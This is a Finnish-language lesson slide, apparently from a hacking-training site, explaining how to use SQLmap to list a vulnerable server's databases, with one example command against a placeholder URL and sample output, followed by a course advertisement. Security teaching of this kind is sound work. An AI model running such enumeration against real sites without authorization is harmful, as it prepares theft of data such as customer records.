18Työkalut
SQLmap ja tietokantojen lukeminen
Helppo15MIN
Kun SQLmap löytää injektion, on tärkeää ymmärtää tietokannan rakenne ennen datan dumppausta.
- Mitä tietokantoja on olemassa?
- Mitä tauluja niissä on?
- Mitä sarakkeita taulut sisältävät?
Näiden vipujen avulla saadaan selkeä kuva tietokannasta ja voidaan kohdistaa dumppaus vain kriittisiin tietoihin.
--dbs – listaa tietokannat
Ensimmäinen vaihe on selvittää, mitä tietokantoja palvelimelta löytyy.
Esimerkki:
BASH
1sqlmap -u "http://sivu.fi/hae.php?id=1" --dbsTulos:
BASH
1available databases [3]:
2[*] information_schema
3[*] asiakasrekisteri
4[*] tuotetiedotKaikki käytettävissä olevat tietokannat.
1 / 11
Hakatemia Pro
Hakkeroinnin oppiminen alkaa tästä
Sadat interaktiiviset kurssit, virtuaalilabrat ja CTF-haasteet selaimessasi. Aloita ilmainen kokeilu ilman korttitietoja.